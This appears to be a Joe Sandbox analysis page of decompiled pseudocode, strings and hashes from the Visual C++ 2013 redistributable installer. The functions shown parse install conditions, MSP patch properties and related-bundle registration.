0x0129dc56
0x0129dc5e
0x0129de74
0x0129de7b
0x0129de86
0x0129de8e
0x0129de8e
0x0129de99
0x0129dea1
0x0129dea1
0x0129deac
0x0129deb4
0x0129deb4
0x0129debf
0x0129dec7
0x0129dec7
0x0129ded2
0x0129deda
0x0129deda
0x0129dee5
0x0129dee7
0x0129df11
0x0129dee9
0x0129dee9
0x0129deea
0x0129df03
0x0129deec
0x0129deed
0x0129def5
0x0129def5
0x0129deed
0x0129deea
0x0129df23
0x0129df23
0x0129dbd3
0x0129dbd5
0x0129dbd7
0x0129dc65
0x0129dc6a
0x0129dc6a
0x0129dc6b
0x0129dc70
0x0129de72
0x00000000
0x0129de73
0x0129dbdd
0x0129dbe3
0x0129dbed
0x0129dbed
0x0129dbf3
0x0129dbf9
0x0129dc15
0x0129dc28
0x0129dc2a
0x0129dc2c
0x0129dc7e
0x00000000
0x0129dc7e
0x0129dc2e
0x0129dc3a
0x0129dc3d
0x0129db7c
0x0129db7c
0x00000000
0x0129db7c
0x00000000
0x0129dc43
0x0129dc0d
0x0129dc0f
0x0129dc11
0x0129dc77
0x00000000
0x0129dc77
0x0129dc13
0x0129dc13
0x00000000
0x0129dbe7
0x0129dbe7
0x00000000
0x0129dbe7
0x0129db7e
0x0129db44
0x0129db61
0x0129db68
0x0129db6c
0x0129dc85
0x0129dc88
0x0129dc8a
0x0129dcbe
0x0129dcde
0x0129dce5
0x0129dce7
0x0129dcf8
0x0129dd19
0x0129dd1b
0x0129dd1d
0x0129dd29
0x0129dd2c
0x0129dd32
0x0129dd40
0x0129dd4d
0x0129dd58
0x0129dd58
0x0129dd59
0x0129de08
0x0129de0f
0x0129de11
0x0129de1a
0x0129de3b
0x0129de3d
0x0129de61
0x0129de63
0x0129de65
0x00000000
0x00000000
0x0129de67
0x00000000
0x0129de67
0x0129de3f
0x00000000
0x0129de3f
0x0129de13
0x00000000
0x0129de13
0x0129dd5f
0x0129dd5f
0x0129dd60
0x0129dd6b
0x0129dd7d
0x0129dd7f
0x0129dd81
0x0129dda0
0x0129dda2
0x0129dda4
0x0129ddc2
0x0129ddc4
0x0129ddc6
0x0129ddea
0x0129ddec
0x0129ddee
0x00000000
0x00000000
0x0129ddf4
0x00000000
0x0129ddf4
0x0129ddc8
0x00000000
0x0129ddc8
0x0129dda6
0x00000000
0x0129dda6
0x0129dd83
0x00000000
0x0129dd83
0x0129dd62
0x0129dd65
0x00000000
0x00000000
0x00000000
0x0129dd65
0x0129dd1f
0x00000000
0x0129dd1f
0x0129dce9
0x00000000
0x0129dce9
0x0129dc8c
0x0129dc8f
0x00000000
0x00000000
0x0129dc9d
0x0129dc9f
0x0129dca1
0x00000000
0x00000000
0x0129dca3
0x0129dcb1
0x00000000
0x0129db72
0x0129db72
0x0129de6c
0x0129de6c
0x0129de6d
0x00000000
0x0129de6d

APIs

_memset.LIBCMT ref: 0129DB0D

Strings

Failed to append patch., xrefs: 0129DC7E
Failed to uninstall MSP package., xrefs: 0129DE67
REBOOT=ReallySuppress, xrefs: 0129DDFC
Failed to add patches to PATCH property on install., xrefs: 0129DDA6
PATCH=", xrefs: 0129DD6C
Failed to initialize external UI handler., xrefs: 0129DB72
Failed to add reboot suppression property on install., xrefs: 0129DDC8
Failed to add reboot suppression property on uninstall., xrefs: 0129DE13
Failed to enable logging for package: %ls to: %ls, xrefs: 0129DCAB
" REBOOT=ReallySuppress, xrefs: 0129DDB1
Failed to get cached path for MSP package: %ls, xrefs: 0129DC50
Failed to add the list of dependencies to ignore to the properties., xrefs: 0129DE3F
%ls %ls=ALL, xrefs: 0129DE2B
Failed to add properties to obfuscated argument string., xrefs: 0129DD1F
Failed to semi-colon delimit patches., xrefs: 0129DC77
Failed to build MSP path., xrefs: 0129DC65
IGNOREDEPENDENCIES, xrefs: 0129DE1A
Failed to add PATCH property on install., xrefs: 0129DD83
Failed to install MSP package., xrefs: 0129DDF4
Failed to add properties to argument string., xrefs: 0129DCE9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: PATCH="$ REBOOT=ReallySuppress$" REBOOT=ReallySuppress$%ls %ls=ALL$Failed to add PATCH property on install.$Failed to add patches to PATCH property on install.$Failed to add properties to argument string.$Failed to add properties to obfuscated argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add the list of dependencies to ignore to the properties.$Failed to append patch.$Failed to build MSP path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for MSP package: %ls$Failed to initialize external UI handler.$Failed to install MSP package.$Failed to semi-colon delimit patches.$Failed to uninstall MSP package.$IGNOREDEPENDENCIES
API String ID: 2102423945-1976012679
Opcode ID: 83f3eec9d6632b48d87caff40e235a19b4f9ff2b3266821b6795618ead542cef
Instruction ID: 347fd4e4fad92e3e61ffdc04727568fd7cba2057ed31c8018ff94385f54f67c6
Opcode Fuzzy Hash: 83f3eec9d6632b48d87caff40e235a19b4f9ff2b3266821b6795618ead542cef
Instruction Fuzzy Hash: 9FC17971A2061D9FDF21DF99CD81EEAB7B6BF98700F4001D9E60963111D6B29EA0DF50

Uniqueness

Uniqueness Score: -1.00%

Function 01296520 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 416
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E01296520(void* __esi, void* __eflags) {
				short _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				short* _t167;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t177;
				void* _t180;
				void* _t181;
				signed short* _t191;
				short* _t199;
				short* _t205;
				signed short* _t211;
				void* _t216;
				void* _t217;
				signed int _t221;
				signed int _t227;
				void* _t228;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t239;
				void* _t241;
				void* _t246;
				void* _t248;
				signed int _t249;
				void* _t250;
				signed int _t252;
				void* _t253;
				void* _t255;
				signed int _t259;
				signed int _t261;
				signed short* _t262;
				signed int _t263;
				int _t266;
				signed int _t267;
				signed int _t268;
				void* _t269;
				void* _t275;

				_t269 = __esi;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				E012A0E72(__esi + 0x18);
				_t221 = 6;
				memset(__esi + 0x10, 0, _t221 << 2);
				while(0 !=  *( *(_t269 + 8))) {
					GetStringTypeW(1,  *(_t269 + 8), 1,  &_v8);
					if((_v8 & 0x00000040) != 0) {
						 *(_t269 + 8) =  &(( *(_t269 + 8))[1]);
						continue;
					}
					break;
				}
				_t167 =  *(_t269 + 8);
				_t259 =  *_t167 & 0x0000ffff;
				_v16 = _t167 -  *((intOrPtr*)(_t269 + 4)) >> 1;
				_t227 = _t259;
				_t255 = 0x3c;
				_t275 = _t227 - _t255;
				if(_t275 > 0) {
					_t228 = _t227 - 0x3d;
					if(_t228 == 0) {
						 *(_t269 + 0x10) = 0x10009;
						goto L98;
					} else {
						_t229 = _t228 - 1;
						if(_t229 == 0) {
							_t172 = (_t167[1] & 0x0000ffff) - _t255;
							if(_t172 == 0) {
								 *(_t269 + 0x10) = 0x1000b;
								goto L96;
							} else {
								_t173 = _t172 - 1;
								if(_t173 == 0) {
									 *(_t269 + 0x10) = 0x10008;
									goto L96;
								} else {
									if(_t173 == 1) {
										 *(_t269 + 0x10) = 0x1000d;
										goto L96;
									} else {
										 *(_t269 + 0x10) = 0x10006;
										goto L98;
									}
								}
							}
							goto L99;
						} else {
							if(_t229 == 0x40) {
								_t232 = (_t167[1] & 0x0000ffff) - _t255;
								if(_t232 == 0) {
									_t176 = (_t167[2] & 0x0000ffff) - _t255;
									if(_t176 == 0) {
										 *(_t269 + 0x10) = 0x3000c;
										goto L87;
									} else {
										_t177 = _t176 - 1;
										if(_t177 == 0) {
											 *(_t269 + 0x10) = 0x30007;
											goto L87;
										} else {
											if(_t177 == 1) {
												 *(_t269 + 0x10) = 0x3000a;
												goto L87;
											} else {
												 *(_t269 + 0x10) = 0x30005;
												goto L96;
											}
										}
									}
									goto L88;
								} else {
									_t233 = _t232 - 1;
									if(_t233 == 0) {
										 *(_t269 + 0x10) = 0x30009;
										goto L96;
									} else {
										if(_t233 == 1) {
											_t180 = (_t167[2] & 0x0000ffff) - _t255;
											if(_t180 == 0) {
												 *(_t269 + 0x10) = 0x3000b;
												goto L87;
											} else {
												_t181 = _t180 - 1;
												if(_t181 == 0) {
													 *(_t269 + 0x10) = 0x30008;
													goto L87;
												} else {
													if(_t181 == 1) {
														 *(_t269 + 0x10) = 0x3000d;
														L87:
														_push(3);
													} else {
														 *(_t269 + 0x10) = 0x30006;
														goto L96;
													}
												}
											}
											goto L88;
										} else {
											_t262 = 0x8007000d;
											 *(_t269 + 0x28) = 1;
											_v12 = 0x8007000d;
											E012B294E(_t167, "condition.cpp", 0x234, 0x8007000d);
											_push(_v16);
											_push( *((intOrPtr*)(_t269 + 4)));
											_push("Failed to parse condition \"%ls\". Unexpected \'~\' operator at position %d.");
											goto L33;
										}
									}
								}
							} else {
								goto L28;
							}
						}
					}
				} else {
					if(_t275 == 0) {
						_t216 = (_t167[1] & 0x0000ffff) - _t255;
						if(_t216 == 0) {
							 *(_t269 + 0x10) = 0x1000c;
							goto L96;
						} else {
							_t217 = _t216 - 1;
							if(_t217 == 0) {
								 *(_t269 + 0x10) = 0x10007;
								goto L96;
							} else {
								if(_t217 == 1) {
									 *(_t269 + 0x10) = 0x1000a;
									L96:
									_push(2);
									L88:
									_pop(_t261);
								} else {
									 *(_t269 + 0x10) = 0x10005;
									goto L98;
								}
							}
						}
						goto L99;
					} else {
						_t249 = _t227;
						if(_t249 == 0) {
							_t261 = _v20;
							 *(_t269 + 0x10) = 1;
							goto L99;
						} else {
							_t250 = _t249 - 0x22;
							if(_t250 == 0) {
								_t268 = _v20;
								_v12 = _t167;
								while(1) {
									_v12 =  &(_v12[1]);
									_t252 =  *_v12 & 0x0000ffff;
									_t268 = _t268 + 1;
									if(0 == _t252) {
										break;
									}
									_t255 = 0x22;
									if(_t255 != _t252) {
										continue;
									} else {
										_t261 = _t268 + 1;
										_t245 = _t261 - 2;
										_push(_t261 - 2);
										 *(_t269 + 0x10) = 0x12;
										_push( &(_t167[1]));
										goto L57;
									}
									goto L100;
								}
								_t262 = 0x8007000d;
								 *(_t269 + 0x28) = 1;
								_v12 = 0x8007000d;
								E012B294E(_t167, "condition.cpp", 0x274, 0x8007000d);
								_push(_v16);
								_push( *((intOrPtr*)(_t269 + 4)));
								_push("Failed to parse condition \"%ls\". Unterminated literal at position %d.");
								goto L33;
							} else {
								_t253 = _t250 - 6;
								if(_t253 == 0) {
									 *(_t269 + 0x10) = 0xe;
									goto L98;
								} else {
									if(_t253 != 1) {
										L28:
										if((_v8 & 0x00000004) != 0) {
											L60:
											_t263 = _v20;
											while(1) {
												_t263 = _t263 + 1;
												_t186 = GetStringTypeW(1,  &(_t167[_t263]), 1,  &_v8);
												if((_v8 & 0x00000100) != 0) {
													break;
												}
												_t186 =  *(_t269 + 8);
												_t236 = 0x5f;
												if(_t236 == ( *(_t269 + 8))[_t263]) {
													break;
												} else {
													if((_v8 & 0x00000004) != 0) {
														continue;
													} else {
														_v24 = _v24 & 0x00000000;
														_v20 = _v20 & 0x00000000;
														 *(_t269 + 0x10) = 0x10;
														if(E012B0352(_t255,  *(_t269 + 8), _t263,  &_v24) >= 0) {
															_t191 = E012A0FC2(_t269 + 0x18, _v24, _v20);
															goto L58;
														} else {
															_t262 = 0x8007000d;
															 *(_t269 + 0x28) = 1;
															_v12 = 0x8007000d;
															E012B294E(_t189, "condition.cpp", 0x296, 0x8007000d);
															_push(_v16);
															_push( *((intOrPtr*)(_t269 + 4)));
															_push("Failed to parse condition \"%ls\". Constant too big, at position %d.");
															goto L33;
														}
													}
												}
												goto L100;
											}
											_t262 = 0x8007000d;
											 *(_t269 + 0x28) = 1;
											_v12 = 0x8007000d;
											E012B294E(_t186, "condition.cpp", 0x289, 0x8007000d);
											_push(_v16);
											_push( *((intOrPtr*)(_t269 + 4)));
											_push("Failed to parse condition \"%ls\". Identifier cannot start at a digit, at position %d.");
											goto L33;
										} else {
											_t239 = 0x2d;
											if(_t239 == _t259) {
												goto L60;
											} else {
												if((_v8 & 0x00000100) != 0) {
													L34:
													GetStringTypeW(1,  &(_t167[1]), 1,  &_v8);
													_t241 = 0x76;
													if(_t241 !=  *( *(_t269 + 8)) || (_v8 & 0x00000004) == 0) {
														_t266 = _v20;
														goto L45;
														do {
															do {
																L45:
																_t266 = _t266 + 1;
																GetStringTypeW(1,  *(_t269 + 8) + _t266 + _t266, 1,  &_v8);
															} while ((_v8 & 0x00000100) != 0 || (_v8 & 0x00000004) != 0);
															_t199 =  *(_t269 + 8);
															_t245 = 0x5f;
														} while (_t245 == _t199[_t266]);
														if(_t266 != 2) {
															if(_t266 != 3) {
																goto L56;
															} else {
																if(CompareStringW(0x7f, 1, _t199, _t266, L"AND", _t266) != 2) {
																	if(CompareStringW(0x7f, 1,  *(_t269 + 8), 3, L"NOT", 3) != 2) {
																		goto L56;
																	} else {
																		 *(_t269 + 0x10) = 4;
																		goto L99;
																	}
																} else {
																	 *(_t269 + 0x10) = _t266;
																	goto L99;
																}
															}
														} else {
															if(CompareStringW(0x7f, 1, _t199, _t266, L"OR", _t266) != _t266) {
																L56:
																_push(_t266);
																_push( *(_t269 + 8));
																 *(_t269 + 0x10) = 0x11;
																L57:
																_push(_t269 + 0x18);
																_t191 = E012A0FFE(_t245, _t255);
																L58:
																_v12 = _t191;
																if(_t191 >= 0) {
																	goto L99;
																} else {
																	_push("Failed to set symbol value.");
																	_push(_t191);
																	E012AFA86();
																}
															} else {
																 *(_t269 + 0x10) = _t266;
																goto L99;
															}
														}
													} else {
														_v12 = 1;
														_t267 = _v20;
														while(1) {
															L37:
															_t267 = _t267 + 1;
															_t205 =  &(( *(_t269 + 8))[_t267]);
															_t246 = 0x2e;
															if(_t246 !=  *_t205) {
																break;
															}
															_v12 =  &(_v12[0]);
															if(_v12 <= 4) {
																continue;
															} else {
																_t262 = 0x8007000d;
																 *(_t269 + 0x28) = 1;
																_v12 = 0x8007000d;
																E012B294E(_t205, "condition.cpp", 0x2ae, 0x8007000d);
																_push(_v16);
																_push( *((intOrPtr*)(_t269 + 4)));
																_push("Failed to parse condition \"%ls\". Version can have a maximum of 4 parts, at position %d.");
																goto L33;
															}
															goto L100;
														}
														GetStringTypeW(1, _t205, 1,  &_v8);
														if((_v8 & 0x00000004) != 0) {
															goto L37;
														} else {
															_t211 = E012B5D5F( &_v8, _t255,  &(( *(_t269 + 8))[1]), _t267 - 1, _t269 + 0x18);
															_v12 = _t211;
															if(_t211 >= 0) {
																 *(_t269 + 0x20) = 3;
																 *(_t269 + 0x10) = 0x13;
																goto L99;
															} else {
																_t262 = 0x8007000d;
																 *(_t269 + 0x28) = 1;
																_v12 = 0x8007000d;
																E012B294E(_t211, "condition.cpp", 0x2c0, 0x8007000d);
																_push(_v16);
																_push( *((intOrPtr*)(_t269 + 4)));
																_push("Failed to parse condition \"%ls\". Invalid version format, at position %d.");
																goto L33;
															}
														}
													}
												} else {
													_t248 = 0x5f;
													if(_t248 == _t259) {
														goto L34;
													} else {
														_t262 = 0x8007000d;
														 *(_t269 + 0x28) = 1;
														_v12 = 0x8007000d;
														E012B294E(_t167, "condition.cpp", 0x2eb, 0x8007000d);
														_push(_v16);
														_push( *((intOrPtr*)(_t269 + 4)));
														_push("Failed to parse condition \"%ls\". Unexpected character at position %d.");
														L33:
														_push(_t262);
														E012AFA86();
													}
												}
											}
										}
									} else {
										 *(_t269 + 0x10) = 0xf;
										L98:
										_t261 = 1;
										L99:
										 *(_t269 + 0x14) = _v16;
										 *(_t269 + 8) =  *(_t269 + 8) + _t261 + _t261;
									}
								}
							}
						}
					}
				}
				L100:
				return _v12;
			}

0x01296520
0x01296529
0x0129652c
0x0129652f
0x01296537
0x0129653e
0x01296544
0x01296563
0x01296553
0x0129655d
0x0129655f
0x00000000
0x0129655f
0x00000000
0x0129655d
0x0129656d
0x01296570
0x0129657c
0x0129657f
0x01296581
0x01296582
0x01296584
0x01296673
0x01296676
0x01296a52
0x00000000
0x0129667c
0x0129667c
0x0129667d
0x01296a22
0x01296a24
0x01296a47
0x00000000
0x01296a26
0x01296a26
0x01296a27
0x01296a3e
0x00000000
0x01296a29
0x01296a2a
0x01296a35
0x00000000
0x01296a2c
0x01296a2c
0x00000000
0x01296a2c
0x01296a2a
0x01296a27
0x00000000
0x01296683
0x01296686
0x01296972
0x01296974
0x012969ed
0x012969ef
0x01296a12
0x00000000
0x012969f1
0x012969f1
0x012969f2
0x01296a09
0x00000000
0x012969f4
0x012969f5
0x01296a00
0x00000000
0x012969f7
0x012969f7
0x00000000
0x012969f7
0x012969f5
0x012969f2
0x00000000
0x01296976
0x01296976
0x01296977
0x012969e0
0x00000000
0x01296979
0x0129697a
0x012969af
0x012969b1
0x012969d7
0x00000000
0x012969b3
0x012969b3
0x012969b4
0x012969ce
0x00000000
0x012969b6
0x012969b7
0x012969c5
0x01296a19
0x01296a19
0x012969b9
0x012969b9
0x00000000
0x012969b9
0x012969b7
0x012969b4
0x00000000
0x0129697c
0x0129697c
0x0129698c
0x01296993
0x01296996
0x0129699b
0x0129699e
0x012969a1
0x00000000
0x012969a1
0x0129697a
0x01296977
0x00000000
0x00000000
0x00000000
0x01296686
0x0129667d
0x0129658a
0x0129658a
0x01296639
0x0129663b
0x01296667
0x00000000
0x0129663d
0x0129663d
0x0129663e
0x0129665b
0x00000000
0x01296640
0x01296641
0x0129664f
0x01296a4e
0x01296a4e
0x01296a1b
0x01296a1b
0x01296643
0x01296643
0x00000000
0x01296643
0x01296641
0x0129663e
0x00000000
0x01296590
0x01296590
0x01296593
0x01296626
0x01296629
0x00000000
0x01296599
0x01296599
0x0129659c
0x012965c2
0x012965c5
0x012965c8
0x012965c8
0x012965cf
0x012965d4
0x012965d8
0x00000000
0x00000000
0x012965dc
0x012965e0
0x00000000
0x012965e2
0x012965e2
0x012965e3
0x012965e6
0x012965ea
0x012965f1
0x00000000
0x012965f1
0x00000000
0x012965e0
0x012965f7
0x01296607
0x0129660e
0x01296611
0x01296616
0x01296619
0x0129661c
0x00000000
0x0129659e
0x0129659e
0x012965a1
0x012965b6
0x00000000
0x012965a3
0x012965a4
0x0129668c
0x01296690
0x012968ab
0x012968ab
0x012968ae
0x012968b2
0x012968bb
0x012968c8
0x00000000
0x00000000
0x012968ca
0x012968cf
0x012968d4
0x00000000
0x012968d6
0x012968da
0x00000000
0x012968dc
0x012968dc
0x012968e0
0x012968ec
0x012968fa
0x01296964
0x00000000
0x012968fc
0x012968fc
0x0129690c
0x01296913
0x01296916
0x0129691b
0x0129691e
0x01296921
0x00000000
0x01296921
0x012968fa
0x012968da
0x00000000
0x012968d4
0x0129692b
0x0129693b
0x01296942
0x01296945
0x0129694a
0x0129694d
0x01296950
0x00000000
0x01296696
0x01296698
0x0129669c
0x00000000
0x012966a2
0x012966a9
0x012966eb
0x012966f8
0x01296703
0x01296707
0x012967d6
0x012967d6
0x012967d9
0x012967d9
0x012967d9
0x012967e0
0x012967eb
0x012967f1
0x01296800
0x01296805
0x01296806
0x0129680f
0x01296832
0x00000000
0x01296834
0x01296849
0x0129686c
0x00000000
0x0129686e
0x0129686e
0x00000000
0x0129686e
0x0129684b
0x0129684b
0x00000000
0x0129684b
0x01296849
0x01296811
0x01296825
0x0129687a
0x0129687a
0x0129687b
0x0129687e
0x01296885
0x01296888
0x01296889
0x0129688e
0x0129688e
0x01296893
0x00000000
0x01296899
0x01296899
0x0129689e
0x0129689f
0x012968a5
0x01296827
0x01296827
0x00000000
0x01296827
0x01296825
0x01296717
0x01296717
0x0129671a
0x0129671d
0x0129671d
0x01296720
0x01296723
0x01296726
0x0129672a
0x00000000
0x00000000
0x0129672c
0x01296733
0x00000000
0x01296735
0x01296735
0x01296745
0x0129674c
0x0129674f
0x01296754
0x01296757
0x0129675a
0x00000000
0x0129675a
0x00000000
0x01296733
0x0129676d
0x01296777
0x00000000
0x01296779
0x01296788
0x0129678d
0x01296792
0x012967c3
0x012967ca
0x00000000
0x01296794
0x01296794
0x012967a4
0x012967ab
0x012967ae
0x012967b3
0x012967b6
0x012967b9
0x00000000
0x012967b9
0x01296792
0x01296777
0x012966ab
0x012966ad
0x012966b1
0x00000000
0x012966b3
0x012966b3
0x012966c3
0x012966ca
0x012966cd
0x012966d2
0x012966d5
0x012966d8
0x012966dd
0x012966dd
0x012966de
0x012966e3
0x012966b1
0x012966a9
0x0129669c
0x012965aa
0x012965aa
0x01296a59
0x01296a5b
0x01296a5c
0x01296a5f
0x01296a65
0x01296a65
0x012965a4
0x012965a1
0x0129659c
0x01296593
0x0129658a
0x01296a68
0x01296a6e

APIs

GetStringTypeW.KERNEL32(00000001,?,00000001,01297324,?,?,00000000,?,?,?,?,01297324,00000000,?,?), ref: 01296553

Strings

Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 01296921
@, xrefs: 01296559
Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 012969A1
AND, xrefs: 01296835
Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 012967B9
Failed to set symbol value., xrefs: 01296899
NOT, xrefs: 01296855
Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 0129675A
Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 0129661C
Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 012966D8
Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 01296950
condition.cpp, xrefs: 01296602, 012966BE, 01296740, 0129679F, 01296907, 01296936, 01296987

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: StringType
String ID: @$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
API String ID: 4177115715-289295652
Opcode ID: b382ee16f0c73e33b006e7bfd262dd1ff821ae32a451fca73183d153335e6fe1
Instruction ID: 9c3cee15a99a316cd20f906a9a17faea1de83b6a0d143b266dea5e7841ed2946
Opcode Fuzzy Hash: b382ee16f0c73e33b006e7bfd262dd1ff821ae32a451fca73183d153335e6fe1
Instruction Fuzzy Hash: 65E1D2B1520706EBEF318F9AC849BBA7BF5FB40704F508A0DE2566A581D7F9A184CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01285BBD Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01285BBD(void* __esi, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t81;
				signed int _t116;
				int _t117;
				intOrPtr _t129;
				void* _t131;

				_t131 = __esi;
				_t116 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				if(E012B4F9E(_a4, L"RelatedBundle",  &_v16) >= 0) {
					_t78 = _v16;
					_t118 =  *_t78;
					_t129 =  *((intOrPtr*)( *_t78 + 0x20))(_t78,  &_v24);
					__eflags = _t129;
					if(_t129 >= 0) {
						_a4 = 0;
						__eflags = _v24;
						if(_v24 > 0) {
							while(1) {
								_t129 = E012B5026(_t118, _v16,  &_v20, 0);
								__eflags = _t129;
								if(_t129 < 0) {
									break;
								}
								_t129 = E012B540B(_v20, L"Action",  &_v12);
								__eflags = _t129;
								if(_t129 < 0) {
									_push("Failed to get @Action.");
									goto L39;
								} else {
									_t129 = E012B540B(_v20, L"Id",  &_v8);
									__eflags = _t129;
									if(_t129 < 0) {
										_push("Failed to get @Id.");
										goto L39;
									} else {
										_t117 = _t116 | 0xffffffff;
										__eflags = CompareStringW(0x7f, 0, _v12, _t117, L"Detect", _t117) - 2;
										if(__eflags != 0) {
											__eflags = CompareStringW(0x7f, 0, _v12, _t117, L"Upgrade", _t117) - 2;
											if(__eflags != 0) {
												__eflags = CompareStringW(0x7f, 0, _v12, _t117, L"Addon", _t117) - 2;
												if(__eflags != 0) {
													__eflags = CompareStringW(0x7f, 0, _v12, _t117, L"Patch", _t117) - 2;
													if(__eflags != 0) {
														_t129 = 0x80070057;
														E012AFA86(0x80070057, "Invalid value for @Action: %ls", _v12);
													} else {
														_t116 = _t131 + 0x30;
														_t129 = E012B23C6(_t118, __eflags, _t116,  *(_t131 + 0x34) + 1, 4, 5);
														__eflags = _t129;
														if(_t129 < 0) {
															_push("Failed to resize Patch code array in registration");
															goto L39;
														} else {
															_t118 =  *_t116;
															 *((intOrPtr*)( *_t116 +  *(_t131 + 0x34) * 4)) = _v8;
															_v8 = _v8 & 0x00000000;
															_t61 = _t131 + 0x34;
															 *_t61 =  *(_t131 + 0x34) + 1;
															__eflags =  *_t61;
															goto L20;
														}
													}
												} else {
													_t116 = _t131 + 0x28;
													_t129 = E012B23C6(_t118, __eflags, _t116,  *(_t131 + 0x2c) + 1, 4, 5);
													__eflags = _t129;
													if(_t129 < 0) {
														_push("Failed to resize Addon code array in registration");
														goto L39;
													} else {
														_t118 =  *_t116;
														 *((intOrPtr*)( *_t116 +  *(_t131 + 0x2c) * 4)) = _v8;
														_v8 = _v8 & 0x00000000;
														 *(_t131 + 0x2c) =  *(_t131 + 0x2c) + 1;
														goto L20;
													}
												}
											} else {
												_t116 = _t131 + 0x20;
												_t129 = E012B23C6(_t118, __eflags, _t116,  *(_t131 + 0x24) + 1, 4, 5);
												__eflags = _t129;
												if(_t129 < 0) {
													_push("Failed to resize Upgrade code array in registration");
													goto L39;
												} else {
													_t118 =  *_t116;
													 *((intOrPtr*)( *_t116 +  *(_t131 + 0x24) * 4)) = _v8;
													_v8 = _v8 & 0x00000000;
													 *(_t131 + 0x24) =  *(_t131 + 0x24) + 1;
													goto L20;
												}
											}
										} else {
											_t116 = _t131 + 0x18;
											_t129 = E012B23C6(_t118, __eflags, _t116,  *(_t131 + 0x1c) + 1, 4, 5);
											__eflags = _t129;
											if(_t129 < 0) {
												_push("Failed to resize Detect code array in registration");
												goto L39;
											} else {
												_t118 =  *_t116;
												 *((intOrPtr*)( *_t116 +  *(_t131 + 0x1c) * 4)) = _v8;
												_v8 = _v8 & 0x00000000;
												 *(_t131 + 0x1c) =  *(_t131 + 0x1c) + 1;
												L20:
												_a4 = _a4 + 1;
												__eflags = _a4 - _v24;
												if(_a4 < _v24) {
													continue;
												} else {
												}
											}
										}
									}
								}
								goto L23;
							}
							_push("Failed to get next RelatedBundle element.");
							goto L39;
						}
					} else {
						_push("Failed to get RelatedBundle element count.");
						goto L39;
					}
				} else {
					_push("Failed to get RelatedBundle nodes");
					L39:
					_push(_t129);
					E012AFA86();
				}
				L23:
				_t80 = _v16;
				if(_t80 != 0) {
					 *((intOrPtr*)( *_t80 + 8))(_t80);
				}
				_t81 = _v20;
				if(_t81 != 0) {
					 *((intOrPtr*)( *_t81 + 8))(_t81);
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t129;
			}

0x01285bbd
0x01285bc9
0x01285bd3
0x01285bd6
0x01285bd9
0x01285bdc
0x01285bdf
0x01285beb
0x01285bf7
0x01285bfa
0x01285c04
0x01285c06
0x01285c08
0x01285c14
0x01285c17
0x01285c1a
0x01285c20
0x01285c2e
0x01285c30
0x01285c32
0x00000000
0x00000000
0x01285c49
0x01285c4b
0x01285c4d
0x01285dfb
0x00000000
0x01285c53
0x01285c64
0x01285c66
0x01285c68
0x01285e02
0x00000000
0x01285c6e
0x01285c74
0x01285c87
0x01285c8a
0x01285ccf
0x01285cd2
0x01285d17
0x01285d1a
0x01285d5c
0x01285d5f
0x01285da3
0x01285dae
0x01285d61
0x01285d6a
0x01285d73
0x01285d75
0x01285d77
0x01285e1e
0x00000000
0x01285d7d
0x01285d83
0x01285d85
0x01285d88
0x01285d8c
0x01285d8c
0x01285d8c
0x00000000
0x01285d8c
0x01285d77
0x01285d1c
0x01285d25
0x01285d2e
0x01285d30
0x01285d32
0x01285e17
0x00000000
0x01285d38
0x01285d3e
0x01285d40
0x01285d43
0x01285d47
0x00000000
0x01285d47
0x01285d32
0x01285cd4
0x01285cdd
0x01285ce6
0x01285ce8
0x01285cea
0x01285e10
